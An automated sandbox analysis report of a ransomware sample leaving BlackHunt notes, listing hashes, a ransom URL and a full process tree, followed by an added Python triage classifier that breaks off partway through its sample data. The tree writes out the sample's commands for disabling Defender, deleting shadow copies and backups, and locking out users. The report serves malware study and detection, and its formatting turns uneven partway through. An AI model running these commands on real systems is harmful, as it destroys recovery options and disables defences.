Analysis
max time kernel: 166s
max time network: 61s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 19/01/2024, 01:27
Static task: static1
Behavioral task: behavioral1
  Sample: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe
  Resource: win10v2004-20231222-en
General
Target: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe
Size: 707KB
MD5: 2bd5a24ab1a18c115c5f47dc7075e248
SHA1: e4d25af6bf6464cac50192949fd4a131629e3623
SHA256: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4
SHA512: 830d09a9624cd5eb5029226f16985ce37968a0a621ed9147a569377d6477b453e63fafaa639f22c26616b1ffeb6f4c70812df1010178025b04272a5fbe6ac54a
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1q8kvnh:6uaTmkZJ+naie5OTamgEoKxLWpah
Malware Config
Extracted
Path: C:\ProgramData\#BlackHunt_ReadMe.hta
URL: http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
Deletes NTFS Change Journal (2 TTPs, 1 IoC)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
  pid 1564  fsutil.exe
IoC rows whose signature heading is missing from the captured page:
  Key created      \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection  reg.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"  reg.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  pid 2488  bcdedit.exe
  pid 1740  bcdedit.exe
Renames multiple (2065) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
IoC row whose signature heading is missing from the captured page:
  pid 1776  wbadmin.exe
Disables Task Manager via registry modification
Disables use of System Restore points (1 TTP)
Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta"  reg.exe
IoC row whose signature heading is missing from the captured page:
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe
Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 2  ip-api.com
Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 672  schtasks.exe
Interacts with shadow copies (2 TTPs, 5 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid 2248  vssadmin.exe
  pid 2252  vssadmin.exe
  pid 1704  vssadmin.exe
  pid 3036  vssadmin.exe
  pid 1664  vssadmin.exe
Modifies registry class (10 IoCs)
  Key created      \REGISTRY\MACHINE\Software\Classes\.Hunt2  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"  reg.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon  reg.exe
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2  reg.exe
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon  reg.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\Hunt2  reg.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\  reg.exe
Suspicious use of AdjustPrivilegeToken (13 IoCs)
  pid 2780  f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe  Token: SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeTakeOwnershipPrivilege, SeAuditPrivilege, SeSecurityPrivilege, SeIncBasePriorityPrivilege
  pid 1964  vssvc.exe  Token: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  pid 1980  wbengine.exe  Token: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
Suspicious use of WriteProcessMemory (64 IoCs)
System policy modification (1 TTP, 3 IoCs)
  Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System  f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"  f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
Indentation shows the process tree (parent above child); each entry gives the image path and PID, then the command line, then the signatures matched on that process.

C:\Users\Admin\AppData\Local\Temp\f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe (PID 2780)
  "C:\Users\Admin\AppData\Local\Temp\f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe"
  - UAC bypass
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification

  C:\Windows\System32\cmd.exe (PID 2068)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 2592)
      reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      - Modifies registry class

  C:\Windows\System32\cmd.exe (PID 2612)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 2608)
      reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Modifies registry class

  C:\Windows\System32\cmd.exe (PID 2136)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 2132)
      reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      - Modifies registry class

  C:\Windows\System32\cmd.exe (PID 2876)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 1940)
      reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Modifies registry class

  C:\Windows\System32\cmd.exe (PID 2632)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 1748)
      reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      - Adds Run key to start application

  C:\Windows\System32\cmd.exe (PID 2696)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2920)
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID 1524)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 1076)
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      - Modifies Windows Defender Real-time Protection settings

  C:\Windows\System32\cmd.exe (PID 2504)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    C:\Windows\system32\reg.exe (PID 1624)
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

  C:\Windows\System32\cmd.exe (PID 1984)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 1868)
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID 2204)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    C:\Windows\system32\reg.exe (PID 920)
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

  C:\Windows\System32\cmd.exe (PID 980)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    C:\Windows\system32\reg.exe (PID 1592)
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

  C:\Windows\System32\cmd.exe (PID 1488)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    C:\Windows\system32\reg.exe (PID 1340)
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

  C:\Windows\System32\cmd.exe (PID 572)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    C:\Windows\system32\reg.exe (PID 1996)
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

  C:\Windows\System32\cmd.exe (PID 1092)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2828)
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID 604)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2760)
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID 780)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2992)
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID 1956)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2676)
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID 2260)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 1700)
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID 1816)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2000)
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1836
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1944
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2820
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2964
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe" /F2⤵PID:2860
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe" /F3⤵
- Creates scheduled task(s)
PID:672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3040
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1552
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3056
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3048
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1236
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:676
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1936
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:808
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1308
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:936
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2232
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2091246139309635215-822438009-2111469512293469732055036302-1706376465-568183572"1⤵PID:1756
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2108
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2828
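The command lines in the process tree above are what a triage or detection workflow actually matches on: every step is a stock Windows tool launched through cmd.exe /c. The following is an added example, not tria.ge output and not code from the sample: a small Python classifier that tokenizes each command line, strips the cmd.exe /c wrapper, and buckets it into the stages this tree shows (Windows Defender policy tampering, recovery inhibition via vssadmin/bcdedit/wbadmin/registry policy, HKCU user-lockout policies, scheduled-task persistence, USN journal deletion). The stage names, the thresholds in looks_like_ransomware_prep and the SAMPLE_EVENTS list (PIDs and command lines copied from the tree above) are this example's own choices; the ThreatSeverityDefaultAction mapping is Defender's documented Group Policy value set, in which 6 means Allow.

```python
"""Classify sandbox process-tree command lines into ransomware pre-encryption stages.
Added triage example, not tria.ge code; stage names and thresholds are this example's own."""
from __future__ import annotations
import re
from collections import Counter, namedtuple

# Defender policy ThreatSeverityDefaultAction data values (GPO "Specify threat alert levels
# at which default action should not be taken when detected"); 6 means Allow.
DEFENDER_ACTION = {1: "Clean", 2: "Quarantine", 3: "Remove", 6: "Allow", 8: "UserDefined", 9: "NoAction", 10: "Block"}
# HKCU policy values that keep the logged-on user from killing the process or logging off.
LOCKOUT_VALUES = {"noclose", "startmenulogoff", "disablechangepassword", "disablelockworkstation",
                  "nologoff", "disabletaskmgr", "norun"}
# HKLM policy key fragments that switch off System Restore, WinRE and Windows Backup.
RECOVERY_KEYS = ("windows nt\\systemrestore", "windows\\winre", "windows\\backup\\client")

Finding = namedtuple("Finding", "pid stage detail")

def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted spans whole (quotes removed)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def unwrap_cmd(tokens: list[str]) -> list[str]:
    """Drop a leading `cmd.exe /c` so the launched tool becomes token 0."""
    if len(tokens) > 2 and tokens[0].lower().endswith("cmd.exe") and tokens[1].lower() == "/c":
        return tokens[2:]
    return tokens

def switch_value(tokens: list[str], name: str) -> str | None:
    """Value following a `/name` switch (reg add ... /v X -> X), or None if absent."""
    low = [t.lower() for t in tokens]
    if name in low and low.index(name) + 1 < len(tokens):
        return tokens[low.index(name) + 1]
    return None

def classify(pid: int, cmdline: str) -> Finding | None:
    toks = unwrap_cmd(tokenize(cmdline))
    if not toks:
        return None
    tool = toks[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe")
    args = " ".join(toks[1:])
    rest = args.lower()
    if tool == "reg" and rest.startswith("add") and len(toks) > 2:
        key, value, data = toks[2].lower(), switch_value(toks, "/v") or "", switch_value(toks, "/d")
        leaf = key.rsplit("\\", 1)[-1]  # last key component, e.g. "threatseveritydefaultaction"
        if "windows defender" in key:
            if leaf == "threatseveritydefaultaction" and data == "6":
                return Finding(pid, "impair_defenses", f"Defender default action for {value} severity set to {DEFENDER_ACTION[6]}")
            return Finding(pid, "impair_defenses", f"Defender policy {value}={data}")
        if any(k in key for k in RECOVERY_KEYS):
            return Finding(pid, "inhibit_recovery", f"policy {value}={data} under {leaf}")
        if key.startswith("hkey_current_user") and value.lower() in LOCKOUT_VALUES:
            return Finding(pid, "user_lockout", f"{value}={data}")
        return Finding(pid, "modify_registry", f"{leaf} {value}={data}")
    if tool == "vssadmin":
        if rest.startswith("delete shadows"):
            return Finding(pid, "inhibit_recovery", "all shadow copies deleted")
        size = re.search(r"/maxsize=(\S+)", args, re.I)
        if rest.startswith("resize shadowstorage") and size:
            return Finding(pid, "inhibit_recovery", f"shadow storage capped at {size.group(1)} (shrinking it evicts existing copies)")
    if tool == "bcdedit" and rest.startswith("/set"):
        return Finding(pid, "inhibit_recovery", "boot config: " + args)
    if tool == "wbadmin" and rest.startswith("delete catalog"):
        return Finding(pid, "inhibit_recovery", "Windows Backup catalog deleted")
    if tool == "fsutil" and rest.startswith("usn deletejournal"):
        return Finding(pid, "anti_forensics", "NTFS USN change journal deleted")
    if tool == "schtasks":
        task = switch_value(toks, "/tn")
        if "/create" in rest:
            return Finding(pid, "persistence", f"task {task!r} runs {switch_value(toks, '/sc')} as {switch_value(toks, '/ru')}")
        if "/change" in rest and "/disable" in rest:
            return Finding(pid, "inhibit_recovery", f"scheduled task {task!r} disabled")
    return None

def triage(events: list[tuple[int, str]]) -> tuple[list[Finding], Counter]:
    """Classify (pid, command line) pairs and count findings per stage."""
    findings = [f for f in (classify(pid, cmd) for pid, cmd in events) if f]
    return findings, Counter(f.stage for f in findings)

def looks_like_ransomware_prep(stages: Counter) -> bool:
    """Heuristic verdict: several recovery-inhibition steps plus defence impairment or user lockout."""
    return stages["inhibit_recovery"] >= 3 and stages["impair_defenses"] + stages["user_lockout"] >= 2

# Constructed input: (PID, command line) pairs copied from the process tree above.
SAMPLE_EVENTS = [
    (1984, '"C:\\Windows\\System32\\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f'),
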